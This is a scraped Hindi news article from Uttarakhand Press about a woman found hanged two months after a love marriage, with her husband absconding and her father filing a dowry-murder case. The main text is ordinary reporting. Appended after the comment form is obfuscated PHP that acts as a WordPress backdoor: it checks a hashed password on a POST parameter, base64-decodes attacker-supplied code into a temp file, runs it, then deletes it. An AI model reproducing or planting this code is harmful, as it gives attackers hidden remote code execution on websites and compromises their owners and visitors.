दो महीने पहले किया प्रेम विवाह, महिला का फंदे पर लटका मिला शव, हत्या का आरोप, पति फरार

Uttarakhand Press 21 June 2023: दो माह पहले प्रेम विवाह करने वाली महिला की सदिग्ध हालत में फंदे पर झूलने से मौत हो गई। घटना के बाद उसका पति फरार हो गया और शव पुलिस ने पोस्टमार्टम के लिए भेजा। मामले में मायके पक्ष ने पति आदि ससुरालियों पर दहेज हत्या का मुकदमा दर्ज कराया है। हालांकि पोस्टमार्टम में मौत का कारण हैंङ्क्षगंग यानि आत्महत्या आया है।

शाहजमाल एडीए देहली गेट के नईम की बेटी मुस्कान ने दो माह पहले ही अपने ही मोहल्ले के दीपक नाम के युवक से खुद की मर्जी से प्रेम विवाह किया था। तभी से वह भुजपुरा में अपने पति संग किराये पर रह रही थी। उसके विवाह करने पर दीपक पर पिता ने मुकदमा भी दर्ज कराया था। मुकदमा विचाराधीन है। इधर, सोमवार रात अचानक महिला का शव पंखे पर फंदे से लटका मिला। इस सूचना पर पहुंची पुलिस ने शव नीचे उतारा और पोस्टमार्टम के लिए भेजा। इस दौरान पति फरार मिला।

पिता नईम की ओर से दी गई तहरीर पर दीपक, उसके पिता, भाइयों व दोस्तों को आरोपी बनाते हुए मुकदमा दर्ज कराया है कि ये लोग पहले से बेटी को मारने की धमकी देते थे। इसी क्रम में इस घटना को अंजाम दिया है। इंस्पेक्टर कोतवाली रामवकील के अनुसार मुकदमा दर्ज कर लिया है। जांच की जा रही है। पोस्टमार्टम रिपोर्ट में हैंङ्क्षगग से मौत होना उजागर हुआ है।

Read Previous

हल्द्वानी: कार को तेज रफ्तार बस ने मार दी टक्कर, हादसे में कपड़ा व्यवसायी घायल, पत्नी की मौत

Read Next

NAINITAL: अब एक महीने नहीं, बल्कि पूरे एक साल तक रहेगा CCTV कैमरों में रिकॉर्ड, एक करोड़ में तैयार हो रहा हाईटेक कंट्रोल रूम

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}